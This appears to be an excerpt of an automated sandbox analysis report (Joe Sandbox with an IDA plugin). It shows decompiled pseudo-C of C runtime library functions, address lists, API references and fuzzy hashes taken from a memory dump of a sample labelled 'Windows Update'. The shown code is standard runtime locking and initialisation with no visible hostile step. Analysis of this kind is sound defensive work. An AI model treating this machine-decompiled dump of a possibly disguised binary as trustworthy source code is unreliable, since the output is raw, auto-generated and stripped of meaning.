                                                                                                                    0x0001f730
                                                                                                                    0x0001f731
                                                                                                                    0x0001f732
                                                                                                                    0x0001f733
                                                                                                                    0x0001f734
                                                                                                                    0x0001f735
                                                                                                                    0x0001f736
                                                                                                                    0x0001f737
                                                                                                                    0x0001f738
                                                                                                                    0x0001f747
                                                                                                                    0x0001f74a
                                                                                                                    0x0001f74b
                                                                                                                    0x0001f75a
                                                                                                                    0x0001f761
                                                                                                                    0x0001f766
                                                                                                                    0x0001f769
                                                                                                                    0x0001f76b
                                                                                                                    0x0001f76d
                                                                                                                    0x0001f771
                                                                                                                    0x0001f777
                                                                                                                    0x0001f780
                                                                                                                    0x0001f779
                                                                                                                    0x0001f779
                                                                                                                    0x0001f779
                                                                                                                    0x0001f78b
                                                                                                                    0x0001f790
                                                                                                                    0x0001f7a2
                                                                                                                    0x0001f7a8
                                                                                                                    0x0001f7aa
                                                                                                                    0x0001f7d7
                                                                                                                    0x0001f7ed
                                                                                                                    0x0001f805
                                                                                                                    0x0001f81b
                                                                                                                    0x0001f833
                                                                                                                    0x0001f839
                                                                                                                    0x0001f83e
                                                                                                                    0x0001f841
                                                                                                                    0x0001f843
                                                                                                                    0x00000000
                                                                                                                    0x0001f849
                                                                                                                    0x0001f849
                                                                                                                    0x0001f84f
                                                                                                                    0x0001f851
                                                                                                                    0x00000000
                                                                                                                    0x0001f857
                                                                                                                    0x0001f857
                                                                                                                    0x0001f85e
                                                                                                                    0x0001f863
                                                                                                                    0x0001f864
                                                                                                                    0x0001f869
                                                                                                                    0x0001f86c
                                                                                                                    0x0001f86e
                                                                                                                    0x0001f9e9
                                                                                                                    0x0001f9e9
                                                                                                                    0x0001f9ef
                                                                                                                    0x0001f9fc
                                                                                                                    0x0001f9fd
                                                                                                                    0x0001f9ff
                                                                                                                    0x0001fa08
                                                                                                                    0x0001f877
                                                                                                                    0x0001f877
                                                                                                                    0x0001f883
                                                                                                                    0x0001f888
                                                                                                                    0x0001f891
                                                                                                                    0x0001f893
                                                                                                                    0x0001f8b4
                                                                                                                    0x0001f8b9
                                                                                                                    0x0001f8bc
                                                                                                                    0x0001f8be
                                                                                                                    0x0001f90a
                                                                                                                    0x0001f90f
                                                                                                                    0x0001f912
                                                                                                                    0x0001f914
                                                                                                                    0x0001f916
                                                                                                                    0x0001f916
                                                                                                                    0x0001f919
                                                                                                                    0x0001f91f
                                                                                                                    0x0001f927
                                                                                                                    0x0001f927
                                                                                                                    0x0001f929
                                                                                                                    0x0001f92a
                                                                                                                    0x0001f92a
                                                                                                                    0x0001f930
                                                                                                                    0x0001f931
                                                                                                                    0x0001f937
                                                                                                                    0x0001fa09
                                                                                                                    0x0001fa0e
                                                                                                                    0x0001fa0f
                                                                                                                    0x0001fa10
                                                                                                                    0x0001fa11
                                                                                                                    0x0001fa12
                                                                                                                    0x0001fa13
                                                                                                                    0x0001fa14
                                                                                                                    0x0001fa15
                                                                                                                    0x0001fa16
                                                                                                                    0x0001fa17
                                                                                                                    0x0001fa1a
                                                                                                                    0x0001fa1b
                                                                                                                    0x0001fa1c
                                                                                                                    0x0001fa21
                                                                                                                    0x0001fa24
                                                                                                                    0x0001fa2d
                                                                                                                    0x0001fa32
                                                                                                                    0x0001fa37
                                                                                                                    0x0001fa40
                                                                                                                    0x0001fa45
                                                                                                                    0x0001fa4a
                                                                                                                    0x0001fa53
                                                                                                                    0x0001fa58
                                                                                                                    0x0001fa5d
                                                                                                                    0x0001fa69
                                                                                                                    0x0001fa6e
                                                                                                                    0x0001fa73
                                                                                                                    0x0001fa7b
                                                                                                                    0x0001fa85
                                                                                                                    0x0001fa8d
                                                                                                                    0x0001fa90
                                                                                                                    0x0001fa9b
                                                                                                                    0x0001faa6
                                                                                                                    0x0001faab
                                                                                                                    0x0001faae
                                                                                                                    0x0001fab6
                                                                                                                    0x0001fabb
                                                                                                                    0x0001fabf
                                                                                                                    0x0001fac8
                                                                                                                    0x0001facd
                                                                                                                    0x0001fad2
                                                                                                                    0x0001fadb
                                                                                                                    0x0001fae0
                                                                                                                    0x0001fae5
                                                                                                                    0x0001faf1
                                                                                                                    0x0001faf6
                                                                                                                    0x0001fafb
                                                                                                                    0x0001fb04
                                                                                                                    0x0001fb0c
                                                                                                                    0x0001fb11
                                                                                                                    0x0001fb11
                                                                                                                    0x0001fb13
                                                                                                                    0x0001fb15
                                                                                                                    0x0001fb1b
                                                                                                                    0x0001f93d
                                                                                                                    0x0001f93d
                                                                                                                    0x0001f93e
                                                                                                                    0x0001f951
                                                                                                                    0x0001f956
                                                                                                                    0x0001f95c
                                                                                                                    0x0001f95f
                                                                                                                    0x0001f961
                                                                                                                    0x0001f961
                                                                                                                    0x0001f967
                                                                                                                    0x0001f967
                                                                                                                    0x0001f969
                                                                                                                    0x0001f96a
                                                                                                                    0x0001f96a
                                                                                                                    0x0001f96e
                                                                                                                    0x0001f96e
                                                                                                                    0x0001f970
                                                                                                                    0x0001f976
                                                                                                                    0x0001f979
                                                                                                                    0x0001f979
                                                                                                                    0x0001f97b
                                                                                                                    0x0001f97c
                                                                                                                    0x0001f97c
                                                                                                                    0x0001f980
                                                                                                                    0x0001f980
                                                                                                                    0x0001f982
                                                                                                                    0x0001f984
                                                                                                                    0x0001f984
                                                                                                                    0x0001f987
                                                                                                                    0x0001f987
                                                                                                                    0x0001f989
                                                                                                                    0x0001f98a
                                                                                                                    0x0001f98a
                                                                                                                    0x0001f98e
                                                                                                                    0x0001f995
                                                                                                                    0x0001f998
                                                                                                                    0x0001f99d
                                                                                                                    0x0001f99f
                                                                                                                    0x0001f9a2
                                                                                                                    0x0001f9a4
                                                                                                                    0x0001f9af
                                                                                                                    0x0001f9bb
                                                                                                                    0x0001f9c9
                                                                                                                    0x0001f9d5
                                                                                                                    0x0001f9da
                                                                                                                    0x0001f9e0
                                                                                                                    0x0001f9e5
                                                                                                                    0x0001f9e5
                                                                                                                    0x0001f9e8
                                                                                                                    0x00000000
                                                                                                                    0x0001f9e8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0001f895
                                                                                                                    0x0001f89b
                                                                                                                    0x0001f8a0
                                                                                                                    0x0001f8a3
                                                                                                                    0x0001f8a5
                                                                                                                    0x0001f8a7
                                                                                                                    0x0001f8a7
                                                                                                                    0x00000000
                                                                                                                    0x0001f8a5
                                                                                                                    0x00000000
                                                                                                                    0x0001f8c0
                                                                                                                    0x0001f8c0
                                                                                                                    0x0001f8cc
                                                                                                                    0x0001f8d1
                                                                                                                    0x0001f8d2
                                                                                                                    0x0001f8d7
                                                                                                                    0x0001f8da
                                                                                                                    0x0001f8da
                                                                                                                    0x0001f8de
                                                                                                                    0x0001f8e4
                                                                                                                    0x0001f8ee
                                                                                                                    0x0001f8ef
                                                                                                                    0x0001f8f3
                                                                                                                    0x0001f8fd
                                                                                                                    0x0001f8fd
                                                                                                                    0x0001f86e
                                                                                                                    0x0001f851
                                                                                                                    0x0001f7ac
                                                                                                                    0x0001f7ac
                                                                                                                    0x0001f7b2
                                                                                                                    0x0001f7b2
                                                                                                                    0x0001f7b5
                                                                                                                    0x0001f7b9
                                                                                                                    0x0001f7c3
                                                                                                                    0x0001f7c3
                                                                                                                    0x0001f6fc
                                                                                                                    0x0001f6fc
                                                                                                                    0x00000000
                                                                                                                    0x0001f6fc
                                                                                                                    0x0001f6fa
                                                                                                                    0x0001f69a
                                                                                                                    0x0001f626
                                                                                                                    0x0001f5f9
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • _wprintf.LIBCMT ref: 0001F406
                                                                                                                    • _wprintf.LIBCMT ref: 0001F410
                                                                                                                    • _wprintf.LIBCMT ref: 0001F430
                                                                                                                    • _wprintf.LIBCMT ref: 0001F526
                                                                                                                    • _wprintf.LIBCMT ref: 0001F530
                                                                                                                      • Part of subcall function 0001F0B7: _wprintf.LIBCMT ref: 0001F100
                                                                                                                      • Part of subcall function 0001F0B7: _wprintf.LIBCMT ref: 0001F114
                                                                                                                      • Part of subcall function 0001F0B7: _wprintf.LIBCMT ref: 0001F123
                                                                                                                      • Part of subcall function 0001F0B7: _wprintf.LIBCMT ref: 0001F139
                                                                                                                      • Part of subcall function 0001F0B7: _wprintf.LIBCMT ref: 0001F154
                                                                                                                      • Part of subcall function 0001F0B7: _wprintf.LIBCMT ref: 0001F15E
                                                                                                                      • Part of subcall function 0001F0B7: _wprintf.LIBCMT ref: 0001F168
                                                                                                                      • Part of subcall function 0001F0B7: _wprintf.LIBCMT ref: 0001F177
                                                                                                                      • Part of subcall function 0001F0B7: _wprintf.LIBCMT ref: 0001F181
                                                                                                                      • Part of subcall function 0001F0B7: _wprintf.LIBCMT ref: 0001F190
                                                                                                                      • Part of subcall function 0001F0B7: _wprintf.LIBCMT ref: 0001F19A
                                                                                                                      • Part of subcall function 0001F0B7: _wprintf.LIBCMT ref: 0001F1A9
                                                                                                                      • Part of subcall function 0001F0B7: _wprintf.LIBCMT ref: 0001F1B3
                                                                                                                      • Part of subcall function 0001EE77: vswprintf.LIBCMT ref: 0001EE9A
                                                                                                                      • Part of subcall function 0001EE77: _wprintf.LIBCMT ref: 0001EEDB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _wprintf$vswprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3567883335-0
                                                                                                                    • Opcode ID: cc4837d878c03868926272d2bd919dc98e7aac5c93c474bb8730b9a8a55dd63a
                                                                                                                    • Instruction ID: e67bf2fdb0048da5304ef3a815662f87d7e1c5bb5acb5fee971571c1b800c3ea
                                                                                                                    • Opcode Fuzzy Hash: cc4837d878c03868926272d2bd919dc98e7aac5c93c474bb8730b9a8a55dd63a
                                                                                                                    • Instruction Fuzzy Hash: D2413771E40246F6DB207BF49C46FFE32589F51721F248635FA1CA20C3DA68998486BB
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0010A643 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 64%
                                                                                                                    			E0010A643(void* __ebx, void* __ecx, void* __edx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t51;
				signed int _t54;
				signed int _t62;
				signed int _t78;
				signed int _t84;
				signed int _t92;
				signed int _t94;
				void* _t99;
				void* _t100;

				_t100 = __eflags;
				_push(0x18);
				_push(0x481128);
				E001028FC(__ebx, __edi, __esi);
				_t94 = __esi | 0xffffffff;
				 *(_t99 - 0x1c) = _t94;
				 *(_t99 - 0x24) =  *(_t99 - 0x24) & 0x00000000;
				_push(0xb);
				_t51 = E001022F5(__ebx, __ecx, __edx, __edi, _t94, _t100);
				if(_t51 != 0) {
					E0010226D(0xb);
					 *(_t99 - 4) =  *(_t99 - 4) & 0x00000000;
					_t78 = 0;
					__eflags = 0;
					while(1) {
						 *(_t99 - 0x28) = _t78;
						__eflags = _t78 - 0x40;
						if(_t78 >= 0x40) {
							break;
						}
						_t92 =  *(0x48b030 + _t78 * 4);
						__eflags = _t92;
						if(_t92 == 0) {
							_t84 = E0010252D(0x20, 0x40);
							 *(_t99 - 0x20) = _t84;
							__eflags = _t84;
							if(_t84 == 0) {
								break;
							}
							 *(0x48b030 + _t78 * 4) = _t84;
							 *0x48b36c =  *0x48b36c + 0x20;
							__eflags =  *0x48b36c;
							while(1) {
								__eflags = _t84 -  *(0x48b030 + _t78 * 4) + 0x800;
								if(__eflags >= 0) {
									break;
								}
								 *((short*)(_t84 + 4)) = 0xa00;
								 *_t84 =  *_t84 | 0xffffffff;
								 *(_t84 + 8) =  *(_t84 + 8) & 0x00000000;
								_t84 = _t84 + 0x40;
								 *(_t99 - 0x20) = _t84;
							}
							_t94 = _t78 << 5;
							 *(_t99 - 0x1c) = _t94;
							 *((char*)( *((intOrPtr*)(0x48b030 + (_t94 >> 5) * 4)) + ((_t94 & 0x0000001f) << 6) + 4)) = 1;
							_push(_t94);
							_t62 = E0010A5B7(_t78, _t92, _t94, __eflags);
							__eflags = _t62;
							if(_t62 == 0) {
								_t94 = _t94 | 0xffffffff;
								__eflags = _t94;
								 *(_t99 - 0x1c) = _t94;
							}
							break;
						} else {
							goto L5;
						}
						while(1) {
							L5:
							 *(_t99 - 0x20) = _t92;
							__eflags = _t92 -  *(0x48b030 + _t78 * 4) + 0x800;
							if(_t92 >=  *(0x48b030 + _t78 * 4) + 0x800) {
								break;
							}
							__eflags =  *(_t92 + 4) & 0x00000001;
							if(( *(_t92 + 4) & 0x00000001) != 0) {
								L14:
								_t92 = _t92 + 0x40;
								continue;
							}
							__eflags =  *(_t92 + 8);
							if( *(_t92 + 8) == 0) {
								E0010226D(0xa);
								 *(_t99 - 4) = 1;
								__eflags =  *(_t92 + 8);
								if( *(_t92 + 8) == 0) {
									_t18 = _t92 + 0xc; // 0x8000000c
									 *0x4741bc(_t18, 0xfa0);
									_t19 = _t92 + 8;
									 *_t19 =  *(_t92 + 8) + 1;
									__eflags =  *_t19;
								}
								_t21 = _t99 - 4;
								 *_t21 =  *(_t99 - 4) & 0x00000000;
								__eflags =  *_t21;
								E0010A717();
							}
							__eflags =  *(_t99 - 0x24);
							if( *(_t99 - 0x24) == 0) {
								_t24 = _t92 + 0xc; // 0x8000000c
								 *0x47409c(_t24);
								__eflags =  *(_t92 + 4) & 0x00000001;
								if(( *(_t92 + 4) & 0x00000001) == 0) {
									__eflags =  *(_t99 - 0x24);
									if( *(_t99 - 0x24) != 0) {
										goto L14;
									}
									 *(_t92 + 4) = 1;
									 *_t92 =  *_t92 | 0xffffffff;
									_t94 = (_t92 -  *(0x48b030 + _t78 * 4) >> 6) + (_t78 << 5);
									__eflags = _t94;
									 *(_t99 - 0x1c) = _t94;
									break;
								}
								_t28 = _t92 + 0xc; // 0x8000000c
								 *0x4740a0(_t28);
							}
							goto L14;
						}
						__eflags = _t94 - 0xffffffff;
						if(_t94 != 0xffffffff) {
							break;
						}
						_t78 = _t78 + 1;
					}
					 *(_t99 - 4) = 0xfffffffe;
					E0010A7DF();
					_t54 = _t94;
					L26:
					return E00102941(_t54);
				}
				_t54 = _t51 | _t94;
				goto L26;
			}












                                                                                                                    0x0010a643
                                                                                                                    0x0010a643
                                                                                                                    0x0010a645
                                                                                                                    0x0010a64a
                                                                                                                    0x0010a64f
                                                                                                                    0x0010a652
                                                                                                                    0x0010a655
                                                                                                                    0x0010a659
                                                                                                                    0x0010a65b
                                                                                                                    0x0010a663
                                                                                                                    0x0010a66e
                                                                                                                    0x0010a674
                                                                                                                    0x0010a678
                                                                                                                    0x0010a678
                                                                                                                    0x0010a67a
                                                                                                                    0x0010a67a
                                                                                                                    0x0010a67d
                                                                                                                    0x0010a680
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0010a686
                                                                                                                    0x0010a68d
                                                                                                                    0x0010a68f
                                                                                                                    0x0010a75a
                                                                                                                    0x0010a75c
                                                                                                                    0x0010a75f
                                                                                                                    0x0010a761
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0010a763
                                                                                                                    0x0010a76a
                                                                                                                    0x0010a76a
                                                                                                                    0x0010a771
                                                                                                                    0x0010a77d
                                                                                                                    0x0010a77f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0010a781
                                                                                                                    0x0010a787
                                                                                                                    0x0010a78a
                                                                                                                    0x0010a78e
                                                                                                                    0x0010a791
                                                                                                                    0x0010a791
                                                                                                                    0x0010a798
                                                                                                                    0x0010a79b
                                                                                                                    0x0010a7b2
                                                                                                                    0x0010a7b7
                                                                                                                    0x0010a7b8
                                                                                                                    0x0010a7be
                                                                                                                    0x0010a7c0
                                                                                                                    0x0010a7c2
                                                                                                                    0x0010a7c2
                                                                                                                    0x0010a7c5
                                                                                                                    0x0010a7c5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0010a695
                                                                                                                    0x0010a695
                                                                                                                    0x0010a695
                                                                                                                    0x0010a6a4
                                                                                                                    0x0010a6a6
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0010a6ac
                                                                                                                    0x0010a6b0
                                                                                                                    0x0010a709
                                                                                                                    0x0010a709
                                                                                                                    0x00000000
                                                                                                                    0x0010a709
                                                                                                                    0x0010a6b2
                                                                                                                    0x0010a6b6
                                                                                                                    0x0010a6ba
                                                                                                                    0x0010a6c0
                                                                                                                    0x0010a6c7
                                                                                                                    0x0010a6cb
                                                                                                                    0x0010a6d2
                                                                                                                    0x0010a6d6
                                                                                                                    0x0010a6dc
                                                                                                                    0x0010a6dc
                                                                                                                    0x0010a6dc
                                                                                                                    0x0010a6dc
                                                                                                                    0x0010a6df
                                                                                                                    0x0010a6df
                                                                                                                    0x0010a6df
                                                                                                                    0x0010a6e3
                                                                                                                    0x0010a6e3
                                                                                                                    0x0010a6eb
                                                                                                                    0x0010a6ed
                                                                                                                    0x0010a6ef
                                                                                                                    0x0010a6f3
                                                                                                                    0x0010a6f9
                                                                                                                    0x0010a6fd
                                                                                                                    0x0010a723
                                                                                                                    0x0010a725
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0010a727
                                                                                                                    0x0010a72b
                                                                                                                    0x0010a73f
                                                                                                                    0x0010a73f
                                                                                                                    0x0010a741
                                                                                                                    0x00000000
                                                                                                                    0x0010a741
                                                                                                                    0x0010a6ff
                                                                                                                    0x0010a703
                                                                                                                    0x0010a703
                                                                                                                    0x00000000
                                                                                                                    0x0010a6ed
                                                                                                                    0x0010a744
                                                                                                                    0x0010a747
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0010a749
                                                                                                                    0x0010a749
                                                                                                                    0x0010a7c8
                                                                                                                    0x0010a7cf
                                                                                                                    0x0010a7d4
                                                                                                                    0x0010a7d6
                                                                                                                    0x0010a7db
                                                                                                                    0x0010a7db
                                                                                                                    0x0010a665
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __mtinitlocknum.LIBCMT ref: 0010A65B
                                                                                                                      • Part of subcall function 001022F5: __FF_MSGBANNER.LIBCMT ref: 0010230A
                                                                                                                      • Part of subcall function 001022F5: __NMSG_WRITE.LIBCMT ref: 00102311
                                                                                                                      • Part of subcall function 001022F5: __malloc_crt.LIBCMT ref: 00102331
                                                                                                                    • __lock.LIBCMT ref: 0010A66E
                                                                                                                    • __lock.LIBCMT ref: 0010A6BA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __lock$__malloc_crt__mtinitlocknum
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1818312207-0
                                                                                                                    • Opcode ID: 984fdba79346da7c941f07d78ca38673703a021201ddbf3c0c4fbfb40fc46d8a
                                                                                                                    • Instruction ID: d16f5b73753e209aaa38873b504a2cd84211d8f65b9be8a071c045d2d7551ee0
                                                                                                                    • Opcode Fuzzy Hash: 984fdba79346da7c941f07d78ca38673703a021201ddbf3c0c4fbfb40fc46d8a
                                                                                                                    • Instruction Fuzzy Hash: 444138719003098BDB149FA8D84876CB7B0BF15724FA0C22DE5A5A72E1E7F59940CB86
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00085B33 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 64%
                                                                                                                    			E00085B33(void* __ebx, void* __ecx, void* __edx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t51;
				signed int _t54;
				signed int _t62;
				signed int _t78;
				signed int _t84;
				signed int _t92;
				signed int _t94;
				void* _t99;
				void* _t100;

				_t100 = __eflags;
				_push(0x18);
				_push(0x47e060);
				E0007EC57(__ebx, __edi, __esi);
				_t94 = __esi | 0xffffffff;
				 *(_t99 - 0x1c) = _t94;
				 *(_t99 - 0x24) =  *(_t99 - 0x24) & 0x00000000;
				_push(0xb);
				_t51 = E0007E4D0(__ebx, __ecx, __edx, __edi, _t94, _t100);
				if(_t51 != 0) {
					E0007E448(0xb);
					 *(_t99 - 4) =  *(_t99 - 4) & 0x00000000;
					_t78 = 0;
					__eflags = 0;
					while(1) {
						 *(_t99 - 0x28) = _t78;
						__eflags = _t78 - 0x40;
						if(_t78 >= 0x40) {
							break;
						}
						_t92 =  *(0x487f50 + _t78 * 4);
						__eflags = _t92;
						if(_t92 == 0) {
							_t84 = E0007E842(0x20, 0x40);
							 *(_t99 - 0x20) = _t84;
							__eflags = _t84;
							if(_t84 == 0) {
								break;
							}
							 *(0x487f50 + _t78 * 4) = _t84;
							 *0x48828c =  *0x48828c + 0x20;
							__eflags =  *0x48828c;
							while(1) {
								__eflags = _t84 -  *(0x487f50 + _t78 * 4) + 0x800;
								if(__eflags >= 0) {
									break;
								}
								 *((short*)(_t84 + 4)) = 0xa00;
								 *_t84 =  *_t84 | 0xffffffff;
								 *(_t84 + 8) =  *(_t84 + 8) & 0x00000000;
								_t84 = _t84 + 0x40;
								 *(_t99 - 0x20) = _t84;
							}
							_t94 = _t78 << 5;
							 *(_t99 - 0x1c) = _t94;
							 *((char*)( *((intOrPtr*)(0x487f50 + (_t94 >> 5) * 4)) + ((_t94 & 0x0000001f) << 6) + 4)) = 1;
							_push(_t94);
							_t62 = E00085AA7(_t78, _t92, _t94, __eflags);
							__eflags = _t62;
							if(_t62 == 0) {
								_t94 = _t94 | 0xffffffff;
								__eflags = _t94;
								 *(_t99 - 0x1c) = _t94;
							}
							break;
						} else {
							goto L5;
						}
						while(1) {
							L5:
							 *(_t99 - 0x20) = _t92;
							__eflags = _t92 -  *(0x487f50 + _t78 * 4) + 0x800;
							if(_t92 >=  *(0x487f50 + _t78 * 4) + 0x800) {
								break;
							}
							__eflags =  *(_t92 + 4) & 0x00000001;
							if(( *(_t92 + 4) & 0x00000001) != 0) {
								L14:
								_t92 = _t92 + 0x40;
								continue;
							}
							__eflags =  *(_t92 + 8);
							if( *(_t92 + 8) == 0) {
								E0007E448(0xa);
								 *(_t99 - 4) = 1;
								__eflags =  *(_t92 + 8);
								if( *(_t92 + 8) == 0) {
									_t18 = _t92 + 0xc; // 0x8000000c
									 *0x4701a8(_t18, 0xfa0);
									_t19 = _t92 + 8;
									 *_t19 =  *(_t92 + 8) + 1;
									__eflags =  *_t19;
								}
								_t21 = _t99 - 4;
								 *_t21 =  *(_t99 - 4) & 0x00000000;
								__eflags =  *_t21;
								E00085C07();
							}
							__eflags =  *(_t99 - 0x24);
							if( *(_t99 - 0x24) == 0) {
								_t24 = _t92 + 0xc; // 0x8000000c
								 *0x47006c(_t24);
								__eflags =  *(_t92 + 4) & 0x00000001;
								if(( *(_t92 + 4) & 0x00000001) == 0) {
									__eflags =  *(_t99 - 0x24);
									if( *(_t99 - 0x24) != 0) {
										goto L14;
									}
									 *(_t92 + 4) = 1;
									 *_t92 =  *_t92 | 0xffffffff;
									_t94 = (_t92 -  *(0x487f50 + _t78 * 4) >> 6) + (_t78 << 5);
									__eflags = _t94;
									 *(_t99 - 0x1c) = _t94;
									break;
								}
								_t28 = _t92 + 0xc; // 0x8000000c
								 *0x470070(_t28);
							}
							goto L14;
						}
						__eflags = _t94 - 0xffffffff;
						if(_t94 != 0xffffffff) {
							break;
						}
						_t78 = _t78 + 1;
					}
					 *(_t99 - 4) = 0xfffffffe;
					E00085CCF();
					_t54 = _t94;
					L26:
					return E0007EC9C(_t54);
				}
				_t54 = _t51 | _t94;
				goto L26;
			}












                                                                                                                    0x00085b33
                                                                                                                    0x00085b33
                                                                                                                    0x00085b35
                                                                                                                    0x00085b3a
                                                                                                                    0x00085b3f
                                                                                                                    0x00085b42
                                                                                                                    0x00085b45
                                                                                                                    0x00085b49
                                                                                                                    0x00085b4b
                                                                                                                    0x00085b53
                                                                                                                    0x00085b5e
                                                                                                                    0x00085b64
                                                                                                                    0x00085b68
                                                                                                                    0x00085b68
                                                                                                                    0x00085b6a
                                                                                                                    0x00085b6a
                                                                                                                    0x00085b6d
                                                                                                                    0x00085b70
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00085b76
                                                                                                                    0x00085b7d
                                                                                                                    0x00085b7f
                                                                                                                    0x00085c4a
                                                                                                                    0x00085c4c
                                                                                                                    0x00085c4f
                                                                                                                    0x00085c51
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00085c53
                                                                                                                    0x00085c5a
                                                                                                                    0x00085c5a
                                                                                                                    0x00085c61
                                                                                                                    0x00085c6d
                                                                                                                    0x00085c6f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00085c71
                                                                                                                    0x00085c77
                                                                                                                    0x00085c7a
                                                                                                                    0x00085c7e
                                                                                                                    0x00085c81
                                                                                                                    0x00085c81
                                                                                                                    0x00085c88
                                                                                                                    0x00085c8b
                                                                                                                    0x00085ca2
                                                                                                                    0x00085ca7
                                                                                                                    0x00085ca8
                                                                                                                    0x00085cae
                                                                                                                    0x00085cb0
                                                                                                                    0x00085cb2
                                                                                                                    0x00085cb2
                                                                                                                    0x00085cb5
                                                                                                                    0x00085cb5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00085b85
                                                                                                                    0x00085b85
                                                                                                                    0x00085b85
                                                                                                                    0x00085b94
                                                                                                                    0x00085b96
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00085b9c
                                                                                                                    0x00085ba0
                                                                                                                    0x00085bf9
                                                                                                                    0x00085bf9
                                                                                                                    0x00000000
                                                                                                                    0x00085bf9
                                                                                                                    0x00085ba2
                                                                                                                    0x00085ba6
                                                                                                                    0x00085baa
                                                                                                                    0x00085bb0
                                                                                                                    0x00085bb7
                                                                                                                    0x00085bbb
                                                                                                                    0x00085bc2
                                                                                                                    0x00085bc6
                                                                                                                    0x00085bcc
                                                                                                                    0x00085bcc
                                                                                                                    0x00085bcc
                                                                                                                    0x00085bcc
                                                                                                                    0x00085bcf
                                                                                                                    0x00085bcf
                                                                                                                    0x00085bcf
                                                                                                                    0x00085bd3
                                                                                                                    0x00085bd3
                                                                                                                    0x00085bdb
                                                                                                                    0x00085bdd
                                                                                                                    0x00085bdf
                                                                                                                    0x00085be3
                                                                                                                    0x00085be9
                                                                                                                    0x00085bed
                                                                                                                    0x00085c13
                                                                                                                    0x00085c15
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00085c17
                                                                                                                    0x00085c1b
                                                                                                                    0x00085c2f
                                                                                                                    0x00085c2f
                                                                                                                    0x00085c31
                                                                                                                    0x00000000
                                                                                                                    0x00085c31
                                                                                                                    0x00085bef
                                                                                                                    0x00085bf3
                                                                                                                    0x00085bf3
                                                                                                                    0x00000000
                                                                                                                    0x00085bdd
                                                                                                                    0x00085c34
                                                                                                                    0x00085c37
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00085c39
                                                                                                                    0x00085c39
                                                                                                                    0x00085cb8
                                                                                                                    0x00085cbf
                                                                                                                    0x00085cc4
                                                                                                                    0x00085cc6
                                                                                                                    0x00085ccb
                                                                                                                    0x00085ccb
                                                                                                                    0x00085b55
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __mtinitlocknum.LIBCMT ref: 00085B4B
                                                                                                                      • Part of subcall function 0007E4D0: __FF_MSGBANNER.LIBCMT ref: 0007E4E5
                                                                                                                      • Part of subcall function 0007E4D0: __NMSG_WRITE.LIBCMT ref: 0007E4EC
                                                                                                                      • Part of subcall function 0007E4D0: __malloc_crt.LIBCMT ref: 0007E50C
                                                                                                                    • __lock.LIBCMT ref: 00085B5E
                                                                                                                    • __lock.LIBCMT ref: 00085BAA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __lock$__malloc_crt__mtinitlocknum
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1818312207-0
                                                                                                                    • Opcode ID: ce6aae9b49ed4f2fd07869c2a7d86244dfa9258787175d0d58d33f75fd344ad8
                                                                                                                    • Instruction ID: 4be8de820daa6d264558e682dea19c7bd59135d03c90108cebbe46aec8e67015
                                                                                                                    • Opcode Fuzzy Hash: ce6aae9b49ed4f2fd07869c2a7d86244dfa9258787175d0d58d33f75fd344ad8
